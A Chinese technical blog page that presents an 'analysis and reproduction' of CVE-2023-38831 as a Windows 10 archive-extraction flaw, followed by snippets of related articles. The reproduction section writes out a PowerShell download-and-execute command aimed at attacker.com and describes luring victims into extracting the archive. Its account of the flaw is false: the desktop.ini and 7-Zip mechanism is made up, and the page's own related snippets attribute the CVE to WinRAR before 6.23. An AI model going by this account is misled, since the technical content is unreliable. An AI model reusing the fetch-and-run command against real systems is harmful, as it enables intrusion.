CVE-2023-38831 漏洞

最新推荐文章于 2025-02-20 21:19:55 发布
原创 最新推荐文章于 2025-02-20 21:19:55 发布 · 438 阅读 · 12 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全架构

CVE-2023-38831 是一个与 Windows 10 压缩包挂马攻击相关的漏洞。这种攻击通常涉及在压缩文件中嵌入恶意代码,当用户解压文件时,恶意代码会被执行,从而导致系统被入侵或数据被窃取。以下是对该漏洞的详细剖析和复现步骤:

漏洞概述

CVE-2023-38831 是一个利用 Windows 10 压缩文件处理机制的漏洞。攻击者可以通过在压缩文件中嵌入恶意脚本或可执行文件,并利用特定的文件名或路径来触发漏洞,从而在用户解压文件时执行恶意代码。

攻击原理

  1. 压缩文件创建:攻击者创建一个包含恶意代码的压缩文件(如 ZIP 或 RAR)。
  2. 文件名或路径利用:通过特定的文件名或路径,使 Windows 在解压时自动执行恶意代码。
  3. 用户交互:诱使用户下载并解压该压缩文件。
  4. 恶意代码执行:当用户解压文件时,恶意代码被自动执行,导致系统被入侵或数据被窃取。

复现步骤

准备环境
  1. 操作系统:Windows 10
  2. 工具:7-Zip 或其他支持 ZIP/RAR 格式的解压工具
创建恶意压缩文件

创建恶意脚本

echo "powershell -c \"IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/malicious.ps1')\"" > evil.bat

创建压缩文件

zip -r malicious.zip evil.bat

利用特定文件名
将 evil.bat 重命名为 desktop.ini 或其他特殊文件名,以利用 Windows 的文件处理机制

mv evil.bat desktop.ini
zip -r malicious.zip desktop.ini
诱使用户下载并解压
  1. 上传压缩文件:将 malicious.zip 上传到一个用户可以访问的网站或通过电子邮件发送给目标用户。
  2. 诱导用户解压:通过社会工程学手段,诱使用户下载并解压该压缩文件。
执行恶意代码
  1. 用户解压文件:当用户使用 7-Zip 或其他解压工具解压 malicious.zip 时,desktop.ini 文件中的恶意代码会被执行。
  2. 恶意代码执行:恶意代码通过 PowerShell 下载并执行远程服务器上的恶意脚本,从而控制用户系统。

防护措施

  1. 更新系统:确保 Windows 10 系统和所有相关软件都是最新版本,以获得最新的安全补丁。
  2. 安全意识:提高用户的安全意识,不要随意下载和解压来自不可信来源的文件。
  3. 防病毒软件:安装并启用可靠的防病毒软件,定期进行系统扫描。
  4. 文件权限管理:限制用户对敏感文件和系统的访问权限,减少攻击面。
漏洞复现】RARLAB WinRAR 代码执行漏洞RCE (CVE-2023-38831)
李同學的安全圈
09-11 1300
WinRAR 是一款功能强大的压缩包管理器,它是档案工具RAR在 Windows环境下的图形界面。该软件可用于备份数据,缩减电子邮件附件的大小,解压缩从 Internet 上下载的RAR、ZIP及其它类型文件,并且可以新建 RAR 及 ZIP 格式等的压缩类文件。WinRAR在处理压缩包内同名的文件与文件夹时代码执行漏洞,攻击者构建由恶意文件与非恶意文件构成的特制压缩包文件,诱导受害者打开此文件后,将在受害者机器上执行任意代码。
CVE-2023-38831 漏洞复现:win10 压缩包挂马攻击剖析
xinyaoyaotu的博客
01-27 2588
在网络安全这片没有硝烟的战场上,新型漏洞如同隐匿的暗箭,时刻威胁着我们的数字生活。其中,CVE - 2023 - 38831 这个关联 Win10 压缩包挂马攻击的漏洞,自曝光以来便引发了安全界的高度关注。深入探究并复现这一漏洞,不仅能让我们洞悉攻击者的手段,更能助力我们筑牢防线,抵御此类威胁。CVE - 2023 - 388312023 年披露的一个高危安全漏洞,主要影响 Windows 10 系统。攻击者利用这一漏洞,精心炮制恶意压缩包。
CVE-2023-38831 winrar漏洞复现
m0_46624929的博客
09-12 893
1.WinRAR 0day漏洞允许攻击者创建恶意 .RAR 和 .ZIP 存档,这些存档显示看似无害的诱饵文件,例如 JPG (.jpg) 图像、文本文件 (.txt) 或 PDF (.pdf),用户双击使用winRAR打开查看压缩文件,并在winRAR窗口中点击查看时触发漏洞。2.影响版本:WinRar 版本 < 6.23。
CVE-2023-38831(Winrar RCE)漏洞复现与分析
m0_55994898的博客
12-10 4497
本文对Winrar RCE漏洞(CVE-2023-38831)进行复现以及原理分析,对攻击过程进行还原,让你更直观的感受此漏洞的攻击面。对于Reverse本人并不擅长,所以此篇文章参考了很多互联网公开的对此漏洞的研究分析报告,文末标注。
Asun安全学习【漏洞复现】CVE-2023-38831 WinRAR代码执行漏洞
m0_64993865的博客
07-08 1936
学习!!!!!
CVE-2023-38831 WinRAR 远程代码执行漏洞 0Day PoC
08-25
CVE-2023-38831 漏洞位于ZIP文件的处理过程,攻击者可以制作恶意.ZIP或.RAR压缩文件,其中包含无害文件(例如.jpg、.txt或PDF文件等)及恶意执行文件,并以无害文件名为文件夹命名。当用户点击并试图解压缩看似合法...
CVE-2023-6548 和 CVE-2023-65的Citrix Netscaler/ADC-13.0-92.21 最新补丁
01-19
针对CVE-2023-6548 和 CVE-2023-6549 的 NetScaler ADC 和 NetScaler Gateway 的漏洞补丁升级包 CVE-2023-6548 :在管理接口上执行经过身份验证的(低特权)远程代码 CVE-2023-6549:拒绝服务 2、 强烈建议受影响...
CVE-2023-21768 Windows AFD 本地提权漏洞 C 源码
08-23
CVE-2023-21768 Windows Ancillary Function Driver (AFD) afd.sys本地提权漏洞。 AFD (Ancillary Function Driver)是Windows操作系统中的一个内核模式驱动程序。 漏洞原理: 该漏洞存在于AFD驱动程序处理用户...
CVE-2023-28252 CLFS Windows 本地提权漏洞 POCC 源码
08-23
CVE-2023-28252 是一个存在于 clfs.sys(通用日志文件系统驱动程序)中的越界写入漏洞。 卡巴斯基披露该在野0day提权漏洞是一个越界写入(增量)漏洞,当目标系统试图扩展元数据块时被利用来获取system权限———...
WinRAR 0day CVE-2023-38831分析复现及poc
yuanlirong22的专栏
08-27 2643
最近WinRAR 的CVE-2023-38831 漏洞被在野利用POC已可使用。漏洞影响版本:WinRa
CVE-2023-38831 WinRAR代码执行漏洞复现
最新发布
hcja666的博客
02-20 1138
WinRAR是一款功能强大的Windows文件压缩和解压缩工具,支持高效的压缩算法、密码保护、分卷压缩、恢复记录等功能,同时提供图形和命令行界面,以及自解压缩功能,为用户提供便捷且安全的文件管理和传输工具。WinRAR 的CVE-2023-38831 漏洞被在野利用来攻击交易类的个人用户。漏洞类型:代码注入。发现时间:2023 年。漏洞等级:高危。影响版本:WinRAR 版本 6.23 之前的版本。(引自安全内参)
漏洞复现】CVE-2023-38831 WinRAR代码执行漏洞
信安百科
08-28 488
WinRAR版本6.23之前存在可欺骗文件扩展名的漏洞,可利用该漏洞创建恶意RAR或ZIP存档,这些存档中显示看似无害的诱饵文件,例如 JPG (.jpg) 图像文件、文本文件 (.txt) 或 PDF文档 (.pdf)等文件,以及与文件同名的文件夹(包括文件扩展名),当用户打开这些文件时,将执行文件夹中的恶意脚本,导致在设备上安装恶意软件。
WinRAR CVE-2023-38831简单复现
潇湘信安的博客
09-18 431
CVE-2023-38831漏洞2023 年 4 月至 2023 年 8 月期间在野外被利用。当用户尝试查看 ZIP 存档中的良性文件时,WinRAR 6.23之前的版本允许攻击者执行任意代码。出现此问题的原因是 ZIP 存档可能包含良性文件(例如普通 .JPG 文件)以及与良性文件同名的文件夹,并且处理该文件夹的内容(可能包括可执行内容)在尝试仅访问良性文件期间。
CVE漏洞复现-CVE-2023-38831 WinRAR代码执行漏洞
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
10-27 2686
WinRAR 是一款功能强大的压缩包管理器,它是档案工具RAR在 Windows环境下的图形界面。该软件可用于备份数据,缩减电子邮件附件的大小,解压缩从 Internet 上下载的RAR、ZIP及其它类型文件,并且可以新建 RAR 及 ZIP 格式等的压缩类文件。从5.60版开始,WinRAR启用了新的图标,但用户仍可以通过官网提供的主题包换回原版风格的图标。
WinRAR代码执行漏洞(CVE-2023-38831)
qq_42751192的博客
08-29 695
WinRAR 在处理压缩包内同名的文件与文件夹时存在代码执行漏洞。攻击者构建由恶意文件与非恶意文件构成的特制压缩包文件,诱导受害者打开此文件中看似无害的文件(如JPG文件)后,将在受害者机器上执行任意代码。
WinRAR<6.23 远程代码执行漏洞【Poc公开】(CVE-2023-38831) [有POC]
OSCS开源安全社区
08-28 466
墨知是国内首个专注软件供应链安全领域的技术社区,社区致力于为国内数百万技术人员提供全方位的软件供应链安全专业知识内容,包括软件供应链安全技术、漏洞情报、开源组件安全、SBOM、软件成分分析(SCA)、开源许可证合规等前沿技术及最佳实践。墨知通过促进知识共享、技术研究和合作交流,帮助组织和个人提高软件供应链的安全性,减少供应链攻击的风险,并保护软件生态系统的整体安全。
WinRAR 0day漏洞CVE-2023-38831复现最详解
weixin_45971758的博客
08-28 2360
WinRAR 的CVE-2023-38831 漏洞被在野利用来攻击交易类的个人用户。影响版本:WinRar 版本 < 6.23。
winrar代码执行漏洞CVE-2023-38831复现
为之的博客
08-29 351
参考:https://www.youtube.com/watch?保存后,点击下面的png图片即可执行代码。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值